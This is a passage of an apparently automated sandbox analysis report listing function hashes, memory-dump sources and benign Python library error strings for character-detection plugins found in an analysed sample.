                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_7ffedd950000_MkWMm5piE5.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Err_String
                                                                                                                                                                                                                                                                          • String ID: 'TooManySymbolOrPunctuationPlugin' object attribute '_character_count' cannot be deleted$attribute '_character_count' of 'TooManySymbolOrPunctuationPlugin' undefined$int
                                                                                                                                                                                                                                                                          • API String ID: 1450464846-4240200891
                                                                                                                                                                                                                                                                          • Opcode ID: 536accf797a1bbe65dc8a4d75f5ab69cf8332c7d165fc34bcb50e14afcb09dcc
                                                                                                                                                                                                                                                                          • Instruction ID: c231ab8b5026e79f5de8ad3960c809bcd62009c3934e3637aaced95467d9832a
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 536accf797a1bbe65dc8a4d75f5ab69cf8332c7d165fc34bcb50e14afcb09dcc
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E6316271F0850281EEA49F55E49427D23A0EF44BA8F5C5132DA1D47FB6FEAEE495C700
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2598055214.00007FFEDD951000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FFEDD950000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2598039044.00007FFEDD950000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2598074345.00007FFEDD965000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2598093889.00007FFEDD96B000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2598111668.00007FFEDD96F000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_7ffedd950000_MkWMm5piE5.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Err_String
                                                                                                                                                                                                                                                                          • String ID: 'TooManyAccentuatedPlugin' object attribute '_character_count' cannot be deleted$attribute '_character_count' of 'TooManyAccentuatedPlugin' undefined$int
                                                                                                                                                                                                                                                                          • API String ID: 1450464846-2022335554
                                                                                                                                                                                                                                                                          • Opcode ID: cef47ad94a8524b23c3b55ca13b9a14f862f4f76f789291d3bde506f314e6f26
                                                                                                                                                                                                                                                                          • Instruction ID: 7c147185262c7888191d9ba8ea88e82a55495d9c5d7818140d848265ea2711ec
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: cef47ad94a8524b23c3b55ca13b9a14f862f4f76f789291d3bde506f314e6f26
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: AF315061F0850682EEA49F65E49427D2390AF44BA8F5C5132DA1D47BF6FEAEE485C700
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          • int, xrefs: 00007FFEDD958446
                                                                                                                                                                                                                                                                          • attribute '_character_count_since_last_sep' of 'ArchaicUpperLowerPlugin' undefined, xrefs: 00007FFEDD958348
                                                                                                                                                                                                                                                                          • 'ArchaicUpperLowerPlugin' object attribute '_character_count_since_last_sep' cannot be deleted, xrefs: 00007FFEDD9583BC
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2598055214.00007FFEDD951000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FFEDD950000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2598039044.00007FFEDD950000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2598074345.00007FFEDD965000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2598093889.00007FFEDD96B000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2598111668.00007FFEDD96F000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_7ffedd950000_MkWMm5piE5.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Err_String
                                                                                                                                                                                                                                                                          • String ID: 'ArchaicUpperLowerPlugin' object attribute '_character_count_since_last_sep' cannot be deleted$attribute '_character_count_since_last_sep' of 'ArchaicUpperLowerPlugin' undefined$int
                                                                                                                                                                                                                                                                          • API String ID: 1450464846-2037488444
                                                                                                                                                                                                                                                                          • Opcode ID: 1006a038ca7837f55bf567080db1d952f620b641b4547de6e2a8b337716dbb5f
                                                                                                                                                                                                                                                                          • Instruction ID: a9cc7411a070b35a441e409de18277139c72712fd3bc3195447d6e93e386502c
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1006a038ca7837f55bf567080db1d952f620b641b4547de6e2a8b337716dbb5f
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D1318261B0850282EE649B25E49427D23A0FF48B98F9C4132DA5E47FF5FEAEE4848700
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2598055214.00007FFEDD951000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FFEDD950000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2598039044.00007FFEDD950000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2598074345.00007FFEDD965000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2598093889.00007FFEDD96B000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2598111668.00007FFEDD96F000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_7ffedd950000_MkWMm5piE5.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Err_String
                                                                                                                                                                                                                                                                          • String ID: 'SuperWeirdWordPlugin' object attribute '_character_count' cannot be deleted$attribute '_character_count' of 'SuperWeirdWordPlugin' undefined$int
                                                                                                                                                                                                                                                                          • API String ID: 1450464846-3920090044
                                                                                                                                                                                                                                                                          • Opcode ID: cd35c19dcae03a46ba023d8733dc0448e3e938908ebc375541851ad2aa41712c
                                                                                                                                                                                                                                                                          • Instruction ID: 7ed65841fe5df1b8fe48ea740164d8b959f9b67436e69eb29a29be96a7a198e7
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: cd35c19dcae03a46ba023d8733dc0448e3e938908ebc375541851ad2aa41712c
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: AA319471F0C50286EEA49B59E49427C2390EF44B98F5C5132EA1E47BF5FEAEE586C700
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2598055214.00007FFEDD951000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FFEDD950000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2598039044.00007FFEDD950000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2598074345.00007FFEDD965000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2598093889.00007FFEDD96B000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2598111668.00007FFEDD96F000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_7ffedd950000_MkWMm5piE5.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Err_String
                                                                                                                                                                                                                                                                          • String ID: 'SuperWeirdWordPlugin' object attribute '_buffer_accent_count' cannot be deleted$attribute '_buffer_accent_count' of 'SuperWeirdWordPlugin' undefined$int
                                                                                                                                                                                                                                                                          • API String ID: 1450464846-76466605
                                                                                                                                                                                                                                                                          • Opcode ID: 20ea869bad6b8ed73006467498f91221eb8f9dd8b91723df2faa57ca20f3ad29
                                                                                                                                                                                                                                                                          • Instruction ID: 172cc159cc9dc03a89e04dec062dd33566738bc910e7df82797b6bed5a86d850
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 20ea869bad6b8ed73006467498f91221eb8f9dd8b91723df2faa57ca20f3ad29
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0731A071B0C50282EA649B25E4A42BD2390EF45BA8F5C4132EA5D47BF5FEAEE594C300
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2598055214.00007FFEDD951000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FFEDD950000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2598039044.00007FFEDD950000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2598074345.00007FFEDD965000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2598093889.00007FFEDD96B000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2598111668.00007FFEDD96F000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_7ffedd950000_MkWMm5piE5.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Err_String
                                                                                                                                                                                                                                                                          • String ID: 'TooManyAccentuatedPlugin' object attribute '_accentuated_count' cannot be deleted$attribute '_accentuated_count' of 'TooManyAccentuatedPlugin' undefined$int
                                                                                                                                                                                                                                                                          • API String ID: 1450464846-3693778415
                                                                                                                                                                                                                                                                          • Opcode ID: 7f11271614b407e1cd5d041de6a849fa1ce6af29865a2d7861870a54299a5fe4
                                                                                                                                                                                                                                                                          • Instruction ID: f98972106879020f6298f44b27f68e0884a810c7701586a08e29830a2ade11a5
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7f11271614b407e1cd5d041de6a849fa1ce6af29865a2d7861870a54299a5fe4
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 70317461B1850282EAB49F15E46427C2360AF45BB8F9C4132DA5D47BF5FEAED4948300
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          • int, xrefs: 00007FFEDD958586
                                                                                                                                                                                                                                                                          • 'ArchaicUpperLowerPlugin' object attribute '_successive_upper_lower_count' cannot be deleted, xrefs: 00007FFEDD9584FC
                                                                                                                                                                                                                                                                          • attribute '_successive_upper_lower_count' of 'ArchaicUpperLowerPlugin' undefined, xrefs: 00007FFEDD958488
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2598055214.00007FFEDD951000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FFEDD950000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2598039044.00007FFEDD950000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2598074345.00007FFEDD965000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2598093889.00007FFEDD96B000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2598111668.00007FFEDD96F000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_7ffedd950000_MkWMm5piE5.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Err_String
                                                                                                                                                                                                                                                                          • String ID: 'ArchaicUpperLowerPlugin' object attribute '_successive_upper_lower_count' cannot be deleted$attribute '_successive_upper_lower_count' of 'ArchaicUpperLowerPlugin' undefined$int
                                                                                                                                                                                                                                                                          • API String ID: 1450464846-634379450
                                                                                                                                                                                                                                                                          • Opcode ID: 3342e34050822ecdd092d2c1701ec675c9b80d10f8f017621af40ec443b25660
                                                                                                                                                                                                                                                                          • Instruction ID: b15cff5d6d6bf2f0e7c0fdb06ce2c65684d071f2393abfbe6bc50f30d9bacb40
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3342e34050822ecdd092d2c1701ec675c9b80d10f8f017621af40ec443b25660
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B6319061B0850282EE749B55E49427C23A0AF48BA8F9C4132DA1E46BB5FEAEE485C700
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2598055214.00007FFEDD951000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FFEDD950000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2598039044.00007FFEDD950000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2598074345.00007FFEDD965000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2598093889.00007FFEDD96B000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2598111668.00007FFEDD96F000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_7ffedd950000_MkWMm5piE5.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Err_String
                                                                                                                                                                                                                                                                          • String ID: 'SuperWeirdWordPlugin' object attribute '_bad_character_count' cannot be deleted$attribute '_bad_character_count' of 'SuperWeirdWordPlugin' undefined$int
                                                                                                                                                                                                                                                                          • API String ID: 1450464846-2709777744
                                                                                                                                                                                                                                                                          • Opcode ID: 610f13cc42156de412b3f6d1ccc7dde81ee8bb81fe19c5e5436d4dfc6cd023cb
                                                                                                                                                                                                                                                                          • Instruction ID: 383c4000e564b7cb72439701ee965ddb1f4b55af75134867b6892f631ad273f1
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 610f13cc42156de412b3f6d1ccc7dde81ee8bb81fe19c5e5436d4dfc6cd023cb
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: AE31A171F0D50282EA649B29E4942BC2390EF44BD8F9C5132EA1D47BF4FEAEE585C700
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2598055214.00007FFEDD951000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FFEDD950000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2598039044.00007FFEDD950000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2598074345.00007FFEDD965000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2598093889.00007FFEDD96B000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2598111668.00007FFEDD96F000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_7ffedd950000_MkWMm5piE5.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Err_String
                                                                                                                                                                                                                                                                          • String ID: 'SuperWeirdWordPlugin' object attribute '_foreign_long_count' cannot be deleted$attribute '_foreign_long_count' of 'SuperWeirdWordPlugin' undefined$int
                                                                                                                                                                                                                                                                          • API String ID: 1450464846-3135691889
                                                                                                                                                                                                                                                                          • Opcode ID: 35cb3d4f2bd9c4a5d37c2cde372bddb3ca93a0b263ca3f3a2d664a0bc4599930
                                                                                                                                                                                                                                                                          • Instruction ID: be6de008725015d1b04f964fe25c2c0cfb383bc996bb404bacef0a332a522dec
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 35cb3d4f2bd9c4a5d37c2cde372bddb3ca93a0b263ca3f3a2d664a0bc4599930
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2B317062B0C50281EA749B25E49427C23A0EF44BA8F5C5132EA5D46BB5FEBEE585C300
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2598055214.00007FFEDD951000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FFEDD950000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2598039044.00007FFEDD950000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2598074345.00007FFEDD965000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2598093889.00007FFEDD96B000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2598111668.00007FFEDD96F000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_7ffedd950000_MkWMm5piE5.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Err_String
                                                                                                                                                                                                                                                                          • String ID: 'ArabicIsolatedFormPlugin' object attribute '_isolated_form_count' cannot be deleted$attribute '_isolated_form_count' of 'ArabicIsolatedFormPlugin' undefined$int
                                                                                                                                                                                                                                                                          • API String ID: 1450464846-4047731557
                                                                                                                                                                                                                                                                          • Opcode ID: 1ec334efbc93af8a0daa537c9c947367f6496fe570f3d383ebc24800b9db443f
                                                                                                                                                                                                                                                                          • Instruction ID: 3c8cd00c92b3a2bb70e039e5b401f64db12a5ee16738bbb99d5330d8cf0ed55b
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1ec334efbc93af8a0daa537c9c947367f6496fe570f3d383ebc24800b9db443f
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9B319261B1850282EB749B15E4542BC23A0AF54B98F9C4233DA5D47BF4FEAEE4858700
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          • int, xrefs: 00007FFEDD954FC6
                                                                                                                                                                                                                                                                          • 'TooManySymbolOrPunctuationPlugin' object attribute '_punctuation_count' cannot be deleted, xrefs: 00007FFEDD954F3C
                                                                                                                                                                                                                                                                          • attribute '_punctuation_count' of 'TooManySymbolOrPunctuationPlugin' undefined, xrefs: 00007FFEDD954EC8
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2598055214.00007FFEDD951000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FFEDD950000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2598039044.00007FFEDD950000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2598074345.00007FFEDD965000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2598093889.00007FFEDD96B000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2598111668.00007FFEDD96F000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_7ffedd950000_MkWMm5piE5.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Err_String
                                                                                                                                                                                                                                                                          • String ID: 'TooManySymbolOrPunctuationPlugin' object attribute '_punctuation_count' cannot be deleted$attribute '_punctuation_count' of 'TooManySymbolOrPunctuationPlugin' undefined$int
                                                                                                                                                                                                                                                                          • API String ID: 1450464846-1459665959
                                                                                                                                                                                                                                                                          • Opcode ID: 524d028e614f50b41909a65e2b05ff1c14cbdfe08726ae935d08e3c758078267
                                                                                                                                                                                                                                                                          • Instruction ID: 5384ad70f99cc75ed3643ad2a71e8937f7b226c073f4d17db334d3c051b546ef
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 524d028e614f50b41909a65e2b05ff1c14cbdfe08726ae935d08e3c758078267
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3A318371F0850291EEA4DB29E4952BC2390EF84B98F5C5132DA1D47BF5FEAEE494C300
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2598055214.00007FFEDD951000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FFEDD950000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2598039044.00007FFEDD950000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2598074345.00007FFEDD965000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2598093889.00007FFEDD96B000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2598111668.00007FFEDD96F000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_7ffedd950000_MkWMm5piE5.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Err_String
                                                                                                                                                                                                                                                                          • String ID: 'CjkInvalidStopPlugin' object attribute '_cjk_character_count' cannot be deleted$attribute '_cjk_character_count' of 'CjkInvalidStopPlugin' undefined$int
                                                                                                                                                                                                                                                                          • API String ID: 1450464846-399339277
                                                                                                                                                                                                                                                                          • Opcode ID: f2c272c237092df4c159db7bbb8ebb4d417ee1358fd08bf9141b406699d39ed6
                                                                                                                                                                                                                                                                          • Instruction ID: 51ba873483cffbfd7d210690b4c0de649007c90c3e992f6805ac60a13e4de687
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f2c272c237092df4c159db7bbb8ebb4d417ee1358fd08bf9141b406699d39ed6
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 92318461B0C50292EA749B25E4542BC23A0EF44B98F5C4232EA5D47BF5FEAEE584C300
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2598055214.00007FFEDD951000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FFEDD950000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2598039044.00007FFEDD950000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2598074345.00007FFEDD965000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2598093889.00007FFEDD96B000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2598111668.00007FFEDD96F000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_7ffedd950000_MkWMm5piE5.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Err_String
                                                                                                                                                                                                                                                                          • String ID: 'UnprintablePlugin' object attribute '_character_count' cannot be deleted$attribute '_character_count' of 'UnprintablePlugin' undefined$int
                                                                                                                                                                                                                                                                          • API String ID: 1450464846-2596148235
                                                                                                                                                                                                                                                                          • Opcode ID: 073f5d8d8577f69fc90c9a8fdde1e95b02313488756eee5ef187c2381a1a2916
                                                                                                                                                                                                                                                                          • Instruction ID: 0086b7b11e7d0d38b3921f906258721ffbbfad38ea37a1498e9d55bce420c821
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 073f5d8d8577f69fc90c9a8fdde1e95b02313488756eee5ef187c2381a1a2916
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 72318572F0854292EAB49F15E4542BD23A0EF44BA8F5C4232DA5D47FF5FEAEE4858300
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2598055214.00007FFEDD951000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FFEDD950000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2598039044.00007FFEDD950000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2598074345.00007FFEDD965000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2598093889.00007FFEDD96B000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2598111668.00007FFEDD96F000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_7ffedd950000_MkWMm5piE5.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Dealloc$FromLong_Ssize_t$ContainsNumber_Object_Set_Vectorcall
                                                                                                                                                                                                                                                                          • String ID: bool$feed
                                                                                                                                                                                                                                                                          • API String ID: 3415927029-2849697477
                                                                                                                                                                                                                                                                          • Opcode ID: eb45302e3cef5080e95074768180575d99dfa37b4141d0cc9422c2bb42ee7491
                                                                                                                                                                                                                                                                          • Instruction ID: ad029f9bbbf57eac9c50f21d3c5ecd23070d5a60878c6fb6a78de3f27d4c991d
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: eb45302e3cef5080e95074768180575d99dfa37b4141d0cc9422c2bb42ee7491
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 03414F25B18A4282EB709F16E5512BE63A0EF44B98F4C5037DE4D47FB6FEAEE4408750
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2596683141.00007FFEDCE31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00007FFEDCE30000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2596666996.00007FFEDCE30000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2596683141.00007FFEDCEB3000.00000020.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2596741686.00007FFEDCEB5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2596766588.00007FFEDCEDD000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2596783848.00007FFEDCEE2000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2596783848.00007FFEDCEE8000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2596783848.00007FFEDCEF0000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_7ffedce30000_MkWMm5piE5.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: R_newR_set_debug
